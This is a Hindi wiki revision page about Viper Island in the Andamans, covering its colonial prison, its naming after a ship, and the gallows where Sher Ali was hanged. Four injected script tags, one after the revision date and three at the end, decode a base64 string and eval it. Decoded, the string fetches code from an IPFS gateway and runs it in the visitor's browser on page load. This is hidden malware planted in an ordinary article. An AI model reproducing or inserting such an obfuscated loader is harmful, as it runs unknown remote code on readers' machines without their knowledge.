Difference between revisions of "वाइपर द्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
{{tocright}}
 
{{tocright}}
 
'''वाइपर द्वीप''' [[अंडमान एवं निकोबार द्वीपसमूह]] में स्थित है। ब्रिटिश शासन में ग़ुलाम [[भारत]] से लाए गए बंदियों को [[पोर्ट ब्लेयर]] के पास वाइपर द्वीप में उतारा जाता था। अब यह  पर्यटन स्थल के रूप में विकसित हो गया है।  
 
'''वाइपर द्वीप''' [[अंडमान एवं निकोबार द्वीपसमूह]] में स्थित है। ब्रिटिश शासन में ग़ुलाम [[भारत]] से लाए गए बंदियों को [[पोर्ट ब्लेयर]] के पास वाइपर द्वीप में उतारा जाता था। अब यह  पर्यटन स्थल के रूप में विकसित हो गया है।  
Line 5: Line 4:
 
वाइपर द्वीप का नामकरण उस जहाज के नाम पर पड़ा, जिसमें सवार होकर ''ले. आर्किबेल्ड ब्लेयर'' यहाँ पर अंडमान में [[नौसेना]] की बुनियाद स्थापित करने की खोज में आया था। माना जाता है कि यह जहाज इसी द्वीप के पास दुर्घटनाग्रस्त हो गया था, जिससे इसका नामकरण उसी जहाज के नाम पर कर दिया गया।
 
वाइपर द्वीप का नामकरण उस जहाज के नाम पर पड़ा, जिसमें सवार होकर ''ले. आर्किबेल्ड ब्लेयर'' यहाँ पर अंडमान में [[नौसेना]] की बुनियाद स्थापित करने की खोज में आया था। माना जाता है कि यह जहाज इसी द्वीप के पास दुर्घटनाग्रस्त हो गया था, जिससे इसका नामकरण उसी जहाज के नाम पर कर दिया गया।
 
==फांसी घर==
 
==फांसी घर==
यहाँ के खंडित फांसी के फंदे निर्मम अतीत के साक्षी बनकर खड़े हैं। यहाँ इस द्वीप पर सबसे पहली [[अंग्रेज़|अंग्रेज़ों]] द्वारा बनाई गई जेल थी। इसके ऊपर पहाड़ी पर तब ही का बना फांसी घर भी है। यहीं पर शेर अली को भी फांसी दी गई थी, जिसने 1872 में भारत के गवर्नर जनरल [[लॉर्ड मेयो]] की हत्या की थी। दिलचस्प बात है कि अंग्रेजों द्वारा बनाई गई सबसे पहली जेल के [[अवशेष]] अभी भी यहाँ मौजूद हैं।  
+
यहाँ के खंडित फांसी के फंदे निर्मम अतीत के साक्षी बनकर खड़े हैं। यहाँ इस द्वीप पर सबसे पहली [[अंग्रेज़|अंग्रेज़ों]] द्वारा बनाई गई जेल थी। इसके ऊपर पहाड़ी पर तब ही का बना फांसी घर भी है। यहीं पर शेर अली को भी फांसी दी गई थी, जिसने 1872 में भारत के [[गवर्नर जनरल]] [[लॉर्ड मेयो]] की हत्या की थी। दिलचस्प बात है कि अंग्रेज़ों द्वारा बनाई गई सबसे पहली जेल के [[अवशेष]] अभी भी यहाँ मौजूद हैं।  
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 17: Line 16:
 
[[Category:अंडमान निकोबार द्वीप समूह]]
 
[[Category:अंडमान निकोबार द्वीप समूह]]
 
[[Category:अंडमान निकोबार द्वीप समूह के पर्यटन स्थल]]
 
[[Category:अंडमान निकोबार द्वीप समूह के पर्यटन स्थल]]
[[Category:नया पन्ना दिसंबर-2011]]
+
 
  
 
__INDEX__
 
__INDEX__

Revision as of 08:24, 26 December 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vaipar dvip aandaman evan nikobar dvipasamooh mean sthit hai. british shasan mean gulam bharat se lae ge bandiyoan ko port bleyar ke pas vaipar dvip mean utara jata tha. ab yah paryatan sthal ke roop mean vikasit ho gaya hai.

namakaran

vaipar dvip ka namakaran us jahaj ke nam par p da, jisamean savar hokar le. arkibeld bleyar yahaan par aandaman mean nausena ki buniyad sthapit karane ki khoj mean aya tha. mana jata hai ki yah jahaj isi dvip ke pas durghatanagrast ho gaya tha, jisase isaka namakaran usi jahaj ke nam par kar diya gaya.

phaansi ghar

yahaan ke khandit phaansi ke phande nirmam atit ke sakshi banakar kh de haian. yahaan is dvip par sabase pahali aangrezoan dvara banaee gee jel thi. isake oopar paha di par tab hi ka bana phaansi ghar bhi hai. yahian par sher ali ko bhi phaansi di gee thi, jisane 1872 mean bharat ke gavarnar janaral l aaurd meyo ki hatya ki thi. dilachasp bat hai ki aangrezoan dvara banaee gee sabase pahali jel ke avashesh abhi bhi yahaan maujood haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>